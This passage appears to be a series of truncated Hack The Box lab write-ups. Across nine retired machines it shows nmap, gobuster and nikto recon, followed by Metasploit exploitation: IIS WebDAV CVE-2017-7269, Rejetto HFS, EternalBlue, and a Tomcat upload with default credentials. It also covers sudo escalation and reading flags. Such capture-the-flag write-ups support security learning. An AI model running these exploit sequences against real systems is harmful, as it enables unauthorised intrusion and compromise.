HTB Arctic

$sudo nmap -A -T4 -p-
8500/tcp open fmtp?
This is an odd open port. Let’s check it.
Access to
These files are part of a ColdFusion 8 installation.
$searchsploit ColdFusion
$searchsploit -x 14641
Access to
What is RDS?
ColdFusion RDS is a security component of ColdFusion Server used by the ColdFusion Administrator and ColdFusion Studio to provide remote HTTP access to files and databases. You can use RDS to manage

GIT Workflow

HTB Blocky

$nmap -T4 -p- -sV -A
Open Ports:
21/tcp    open   ftp       ProFTPD 1.3.5a
22/tcp    open   ssh       OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp    open   http      Apache httpd 2.4.18 ((Ubuntu))
25565/tcp open   minecraft Minecraft 1.11.2
http-generator: WordPress 4.8
$gobuster dir -u -w /usr/share/wordlists/dirb/common.txt -e
PhpMyAdmin login site:
WordPress admin login site:
Uploads folder

HTB Granny

$nmap -T4 -A -sV -p-
$nmap -p 80 --script vuln
$gobuster dir -u -w /usr/share/wordlists/dirb/common.txt -e
$nikto -h
Based on Grandpa’s vulnerability…
msf5 > search CVE-2017-7269
msf5 > use 0
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > options
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set rhosts
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set lhost
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run
meterpreter > getuid
meterpreter > shell
c:\windows\system32\inetsrv>whoami
meterpreter > run post/multi/recon/local_exploit_suggester
meterpreter > getpid
meterpreter > ps

HTB Grandpa

$nmap -T4 -sV -A -p-
Open Ports:
80/tcp open http Microsoft IIS httpd 6.0
This seems to be an old version of IIS. According to, we are working with Windows Vista (Business and Ultimate only) and Windows Server 2008.
$gobuster dir -u -w /usr/share/wordlists/dirb/common.txt -e
$nikto -h
It seems that IIS 6.0 is vulnerable to a zero-day buffer overflow vulnerability (CVE-2017-7269). Let’s follow this path. More information

HTB Bashed

$nmap -T4 -A -sV -p-
Access to
$nikto -h
$gobuster dir -u -w /usr/share/wordlists/dirb/common.txt -e
www-data@bashed:/var/www/html/dev# cd /home/
www-data@bashed:/home# ls
www-data@bashed:/home# cd arrexel
www-data@bashed:/home/arrexel# cat user.txt
www-data@bashed:/var/www/html/dev# sudo -l
The command sudo -l reveals that the www-data user can run any command as scriptmanager. Running the command sudo -u scriptmanager bash -i will spawn a bash shell
www-data@bashed:/# ls -la
www-data@bashed:/# sudo cd scriptmanager
www-data@bashed

HTB Nibbles

$nmap -A -sV -T4 -p-
Open ports:
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Access to
Do we have a /nibbleblog directory?
Access to
$nikto -h
Results:
OSVDB-29786: /nibbleblog/admin.php?en_log_id=0&action=config: EasyNews from version 4.3 allows remote admin access. This PHP file should be protected.
OSVDB-29786: /nibbleblog/admin.php?en_log_id=0&action=users: EasyNews from version 4.3 allows remote admin access.

HTB Optimum

$nmap -A -sV -p-
$nikto -h
$searchsploit hfs
$cat /usr/share/exploitdb/exploits/windows/remote/346
msf5 > search hfs
msf5 > use 1
msf5 exploit(windows/http/rejetto_hfs_exec) > options
msf5 exploit(windows/http/rejetto_hfs_exec) > set rhost
msf5 exploit(windows/http/rejetto_hfs_exec) > run
meterpreter > ls
meterpreter > cat user.txt.txt
meterpreter > getuid
meterpreter > sysinfo
Sysinfo shows that we are on a Windows 2012 R2 server with an x64 architecture. Due to the fact that the default reverse_tcp

HTB Blue

$nmap -A -T4 -p- -sV
Result analysis:
135: windows rpc
139: smb
445: smb
OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
$nmap -p 445 --script vuln
msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > options
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
C:\Windows\system32>whoami
C:\Users>dir
C:\Users>cd haris
C:\Users\haris>cd Desktop
C:\Users\haris\Desktop>dir
C:\Users\haris\Desktop>type user.txt
C:\Users>cd Administrator
C:\Users\Administrator>cd Desktop
C:\Users\Administrator\Desktop>dir
C:\Users\Administrator\Desktop>type root.txt

HTB Jerry

$nmap -A -T4 -p- -sV -Pn
$gobuster dir -u -w /usr/share/wordlists/dirb/common.txt -e
$nikto -h
Access to
Use the credentials found in Nikto’s results (tomcat/s3cret).
As we can observe, we are able to upload and deploy a WAR file.
msf5 > use exploit/multi/http/tomcat_mgr_upload
msf5 exploit(multi/http/tomcat_mgr_upload) > options
msf5 exploit(multi/http/tomcat_mgr_upload) > set HttpPassword s3cret
msf5 exploit(multi/http/tomcat_mgr_upload) > set HttpUsername tomcat
msf5 exploit(multi/http/tomcat_mgr_upload) > set rhost
msf5 exploit(multi/http/tomcat_mgr_upload) > set